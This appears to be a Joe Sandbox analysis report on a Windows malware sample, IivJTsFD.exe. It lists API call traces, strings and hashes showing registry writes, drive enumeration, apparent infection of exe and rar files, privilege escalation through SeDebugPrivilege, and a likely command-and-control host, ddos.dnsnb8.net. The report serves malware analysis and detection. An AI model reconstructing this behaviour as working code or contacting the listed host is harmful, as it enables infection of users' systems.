Opcode ID: 0c93badea95ad759b4e56f00eb3f4a5b6dc2b390a7853347ff30cc46e99fd738
Instruction ID: 5edf83533d02ffb4371d2b85ee696309b774eaf235175b56a109dbc92b8e0efc
Opcode Fuzzy Hash: 0c93badea95ad759b4e56f00eb3f4a5b6dc2b390a7853347ff30cc46e99fd738
Instruction Fuzzy Hash: 21218375920309BADB21EBA0EC49FAFFBBCAB0535BF114095E904A2050D7745FA8CF58

Function 00251718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 00251729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 0025174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 0025177C
__aulldiv.LIBCMT ref: 00251796
__aulldiv.LIBCMT ref: 002517A8

Strings

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 00251722
SOFTWARE\GTplus, xrefs: 00251742, 0025176B
Time, xrefs: 0025173D, 00251766

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-809295866
Opcode ID: e653847f1a2f0e1527966f016075962c1c51ec9141c7665b62a0d96894f23819
Instruction ID: bd998aa6e761dc83e06393a55c42c12d015f1ad4e1ed6edfefb14e12e567578b
Opcode Fuzzy Hash: e653847f1a2f0e1527966f016075962c1c51ec9141c7665b62a0d96894f23819
Instruction Fuzzy Hash: 59119A71910205BBEB10DAA4CC89FEFBBBCEB05B56F108015FD04E6180D7709A6CCB68

Function 00256076 Relevance: 11.1, APIs: 7, Instructions: 614
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 002560BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 002560DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00256189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 002561A5

Memory Dump Source

Source File: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: cba2ea997ace53cba84f36e9fe489942bd1c8e6b61163523fca389332fdb48b8
Instruction ID: 0a4e86df703e199fdf4a9cffd2a64f7bf9b7ef2d5ec94155cb859fc09c73f706
Opcode Fuzzy Hash: cba2ea997ace53cba84f36e9fe489942bd1c8e6b61163523fca389332fdb48b8
Instruction Fuzzy Hash: C91279B15287869FDB318F24CC497EA3BB4EF02311F98459DDC898B293D774A928C758

Function 00252B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00252BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00252BB4
GetDriveTypeA.KERNEL32(?), ref: 00252BD3
CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00252BEE
lstrlen.KERNEL32(?), ref: 00252BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00252C16
CreateThread.KERNEL32(00000000,00000000,00252845,00000000,00000000,00000000), ref: 00252C3A

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 0ef067104aa86e3f2caa8ba07a7f2655df45630d9e0ed29bf641de160582b0a4
Instruction ID: 0b980c0ff2d0232149ce2a00e79ac7782b4f616892088e4c02b10a9e359955a3
Opcode Fuzzy Hash: 0ef067104aa86e3f2caa8ba07a7f2655df45630d9e0ed29bf641de160582b0a4
Instruction Fuzzy Hash: E421A4B181034DEFD720EF64AC88EAE7B6DFB0635AB150115FC4292191D7308D5ECB68

Function 00251E6E Relevance: 44.1, APIs: 20, Strings: 5, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,002532B0,00000164,00252986,?), ref: 00251EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00251ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00251EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00251F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00251F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0025201E
memset.MSVCRT ref: 002520D8
memset.MSVCRT ref: 002520EA
memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0025222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00252238
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0025224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002522C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002522CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002522DD
WriteFile.KERNEL32(000000FF,00254008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 002522F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0025230D
CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00252322
UnmapViewOfFile.KERNEL32(?,?,002532B0,00000164,00252986,?), ref: 00252340
CloseHandle.KERNEL32(?,?,002532B0,00000164,00252986,?), ref: 0025234E
CloseHandle.KERNEL32(000000FF,?,002532B0,00000164,00252986,?), ref: 00252359

Strings

m@%, xrefs: 00251E8F, 0025225A
.@%, xrefs: 00252274
C@%, xrefs: 0025229E
<@%, xrefs: 00252290
5@%, xrefs: 00252282

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
String ID: .@%$5@%$<@%$C@%$m@%
API String ID: 3043204753-1856539476
Opcode ID: 364edc38a02a5e98076a795911278ae05a26c6e0c6799e6450ec06e4ce37756f
Instruction ID: f596a3ae50297ca4fcbc869463becfe5e163233ade6848aa1b8c4dc7deda682d
Opcode Fuzzy Hash: 364edc38a02a5e98076a795911278ae05a26c6e0c6799e6450ec06e4ce37756f
Instruction Fuzzy Hash: 19F1A571910309EFCB10DFA4DC85AADBBB5FF09316F104529E909A7291D730ADA9CF58

Function 00251973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(\N%`N%,00000000,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 00251992
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002519BA
Sleep.KERNEL32(00000064), ref: 002519C6
wsprintfA.USER32 ref: 002519EC
CopyFileA.KERNEL32(?,?,00000000), ref: 00251A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00251A1E
GetFileSize.KERNEL32(?,00000000), ref: 00251A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00251A46
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00251A65
CloseHandle.KERNEL32(000000FF), ref: 00251A90
DeleteFileA.KERNEL32(?), ref: 00251AA7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00251AC1

Strings

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 0025197C
%s%.8X.data, xrefs: 002519E6
C:\Users\user\AppData\Local\Temp\, xrefs: 002519DB
\N%`N%, xrefs: 00251980

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: File$CreateVirtual$AllocCloseCopyDeleteExistsFreeHandlePathReadSizeSleepwsprintf
String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$\N%`N%
API String ID: 716042067-756885908
Opcode ID: 01831d23bce8bbd4e357046129e1d17cdbd5223e940f2a34f9604367c84db37e
Instruction ID: 47864c7604b38f13a52a131ee2097e57aba6eb07ab59751d97a7c632feedbe29
Opcode Fuzzy Hash: 01831d23bce8bbd4e357046129e1d17cdbd5223e940f2a34f9604367c84db37e
Instruction Fuzzy Hash: 9F51607191121AEFCB12DF98DC88AAEBBB8FB05356F104569F915E2190C3709E68CF94

Function 002528B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 002528D3
wsprintfA.USER32 ref: 002528F7
memset.MSVCRT ref: 00252925
wsprintfA.USER32 ref: 00252940

Part of subcall function 002529E2: memset.MSVCRT ref: 00252A02
Part of subcall function 002529E2: wsprintfA.USER32 ref: 00252A1A
Part of subcall function 002529E2: memset.MSVCRT ref: 00252A44
Part of subcall function 002529E2: lstrlen.KERNEL32(?), ref: 00252A54
Part of subcall function 002529E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00252A6C
Part of subcall function 002529E2: strrchr.MSVCRT ref: 00252A7C
Part of subcall function 002529E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00252A9F
Part of subcall function 002529E2: lstrlen.KERNEL32(Documents and Settings), ref: 00252AAE
Part of subcall function 002529E2: memset.MSVCRT ref: 00252AC6
Part of subcall function 002529E2: memset.MSVCRT ref: 00252ADA
Part of subcall function 002529E2: FindFirstFileA.KERNEL32(?,?), ref: 00252AEF
Part of subcall function 002529E2: memset.MSVCRT ref: 00252B13

strrchr.MSVCRT ref: 00252959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00252974

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 002529B3
%s\, xrefs: 0025293A
rar, xrefs: 00252988
exe, xrefs: 0025296D
%s%s, xrefs: 002528F1

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-3007274656
Opcode ID: 7ed8d6c5eca3960cb5d598091963e763f45ef2a5a2e53785405b48745bbce812
Instruction ID: 3a65f2b2754e86a8bcc2d3662852b970c48a5c4846abd3be6da3589ca69fd17c
Opcode Fuzzy Hash: 7ed8d6c5eca3960cb5d598091963e763f45ef2a5a2e53785405b48745bbce812
Instruction Fuzzy Hash: 5331B571950309ABDB20EB64DC89FDA776CEB12352F140452FD45E21C1E6B4EAEC8B68

Function 00251638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0025164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0025165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,00000104), ref: 0025166E
CreateThread.KERNEL32(00000000,00000000,00251099,00000000,00000000,00000000), ref: 002516AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 002516BD

Part of subcall function 0025139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 002513BC
Part of subcall function 0025139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002513DA
Part of subcall function 0025139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00251448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 002516E5

Strings

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 00251662, 00251667, 002516DD
C:\Users\user\AppData\Local\Temp\, xrefs: 00251644
C:\Windows\system32, xrefs: 00251656
Documents and Settings, xrefs: 00251696

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\IivJTsFD.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-2678541693
Opcode ID: 1cecdb27434db12cb6b2c9725a111cbad10d2fe12d9c5aebf36962d7c501a6d2
Instruction ID: 7ce6d739f96629ded563319313f3e37b1aa49c99376dd4f05c45388c0af84028
Opcode Fuzzy Hash: 1cecdb27434db12cb6b2c9725a111cbad10d2fe12d9c5aebf36962d7c501a6d2
Instruction Fuzzy Hash: 9A11DA715613147BCB10ABA4BD4DFABBE6DEB163A7F000011FA09910E0C67045B8CBAD

Function 00251000 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HG%,http://%s:%d/%s/%s,002510E8,?), ref: 00251018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400), ref: 00251029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00251038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0025104B
UnmapViewOfFile.KERNEL32(00000000), ref: 00251075
CloseHandle.KERNEL32(?), ref: 0025108B
CloseHandle.KERNEL32(00000000), ref: 0025108E

Strings

http://%s:%d/%s/%s, xrefs: 00251000
ddos.dnsnb8.net, xrefs: 00251026
HG%, xrefs: 00251001

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: HG%$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3533919112
Opcode ID: 1956122b2d4376ec1ccb8ea4e0fe97e46ffa064915f2270615ca1bb3f6e75342
Instruction ID: e746b4313bdebd0a41f599e41634a4f710c4ddf5dfb2fabec4e3073f3e3f50c0
Opcode Fuzzy Hash: 1956122b2d4376ec1ccb8ea4e0fe97e46ffa064915f2270615ca1bb3f6e75342
Instruction Fuzzy Hash: 7401447150435DBFE731AF60AC8CF2BBBACDB447EAF004529FA45A21D0D6705E648B68

Function 00252C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00252C57

Part of subcall function 00251973: PathFileExistsA.SHLWAPI(\N%`N%,00000000,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 00251992
Part of subcall function 00251973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 002519BA
Part of subcall function 00251973: Sleep.KERNEL32(00000064), ref: 002519C6
Part of subcall function 00251973: wsprintfA.USER32 ref: 002519EC
Part of subcall function 00251973: CopyFileA.KERNEL32(?,?,00000000), ref: 00251A00
Part of subcall function 00251973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00251A1E
Part of subcall function 00251973: GetFileSize.KERNEL32(?,00000000), ref: 00251A2C
Part of subcall function 00251973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00251A46
Part of subcall function 00251973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00251A65

CreateThread.KERNEL32(00000000,00000000,00252B8C,00000000,00000000,00000000), ref: 00252C99
WaitForMultipleObjects.KERNEL32(00000001,002516BA,00000001,000000FF,?,002516BA,00000000), ref: 00252CAC
VirtualFree.KERNEL32(01310000,00000000,00008000,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,00254E5C,00254E60,?,002516BA,00000000), ref: 00252CC2

Strings

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 00252C69

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
API String ID: 2042498389-1099539689
Opcode ID: cf0488429f818d05a880bbc6d23ee7f50b60413b8d25dff325f48908d92701e4
Instruction ID: 34d567398885fa33c1eb6f0eac86f89c1948ff1b5ffd72848de2037db32c196b
Opcode Fuzzy Hash: cf0488429f818d05a880bbc6d23ee7f50b60413b8d25dff325f48908d92701e4
Instruction Fuzzy Hash: AB018471651320BBD710EB95AC0EEDFBE6CEF02B67F504111BD05E61C2D5B09968C7A8

Function 002514E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00251504
VirtualQuery.KERNEL32(002514E1,?,0000001C), ref: 00251525
ExitProcess.KERNEL32 ref: 0025157A

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 81b919c50477efa3b789b0d2519018b004a5d155bb76508473663aaa142e2e87
Instruction ID: dbb5e28cbfb2c0fe4595fdc8aa05e9a87b04f54017b588b3a115eaddd4d5c30e
Opcode Fuzzy Hash: 81b919c50477efa3b789b0d2519018b004a5d155bb76508473663aaa142e2e87
Instruction Fuzzy Hash: D7117371911305DFCB11EF65B88977DB7BCEB84B67B10402AF802D6150E27089A5DB58

Function 00251915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00251933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00251947

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: fdc8c46688d9f5678e45bc166fa361e0266aed6580a8c65c1a7cbde00e466762
Instruction ID: 89775200bf63927a54fcb41e8885c639694b0ee43f89680f125f67da16a9f745
Opcode Fuzzy Hash: fdc8c46688d9f5678e45bc166fa361e0266aed6580a8c65c1a7cbde00e466762
Instruction Fuzzy Hash: C8F04432210349ABD720DE66DC04BA777ACAB50362F00853AF916D1090E770D66DCBA4

Function 00256159 Relevance: 2.6, APIs: 2, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 002560DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00256189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 002561A5

Memory Dump Source

Source File: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: c4abdfdfe6dabdcb7f6596257cc28f93221043cc0ca92a868a2ca5549ad778b4
Instruction ID: acd1a0bc0822bbd67bf698448c53c0433187460f0748d6a448d0b0ebfb5244b6
Opcode Fuzzy Hash: c4abdfdfe6dabdcb7f6596257cc28f93221043cc0ca92a868a2ca5549ad778b4
Instruction Fuzzy Hash: 68118F3161064ACFCF318F58CC897ED37A1FF44302FA94018DD8D9B691DAB56968CB98

Non-executed Functions

Function 0025119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,?,?,002513EF), ref: 002511AB
OpenProcessToken.ADVAPI32(00000000,00000028,002513EF,?,?,?,?,?,?,002513EF), ref: 002511BB
AdjustTokenPrivileges.ADVAPI32(002513EF,00000000,?,00000010,00000000,00000000), ref: 002511EB
CloseHandle.KERNEL32(002513EF), ref: 002511FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,002513EF), ref: 00251203

Strings

C:\Users\user\AppData\Local\Temp\IivJTsFD.exe, xrefs: 002511A5

Memory Dump Source

Source File: 00000001.00000002.1948111174.0000000000251000.00000020.00000001.01000000.00000004.sdmp, Offset: 00250000, based on PE: true

Associated: 00000001.00000002.1948096690.0000000000250000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948123864.0000000000253000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948192701.0000000000254000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1948206827.0000000000256000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_250000_IivJTsFD.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\IivJTsFD.exe
API String ID: 75692138-1099539689
Opcode ID: 7184b45555dd2616da83672e6d2d28045b3504028ddb6c5a933628d89db3c660
Instruction ID: d65f59955f39a358518d8e61d0580f474339febdbbd27373ab20f9ffea464f15
Opcode Fuzzy Hash: 7184b45555dd2616da83672e6d2d28045b3504028ddb6c5a933628d89db3c660
Instruction Fuzzy Hash: 5C01E4B5900309EFDB00DFE4DD89AAEBBB8FB04346F504469E606A2290D7719F589B64

Function 0025139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IivJTsFD.exe), ref: 002513BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 002513DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00251448

Part of subcall function 0025119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IivJTsFD.exe,?,?,?,?,?,?,002513EF), ref: 002511AB
Part of subcall function 0025119F: OpenProcessToken.ADVAPI32(00000000,00000028,002513EF,?,?,?,?,?,?,002513EF), ref: 002511BB
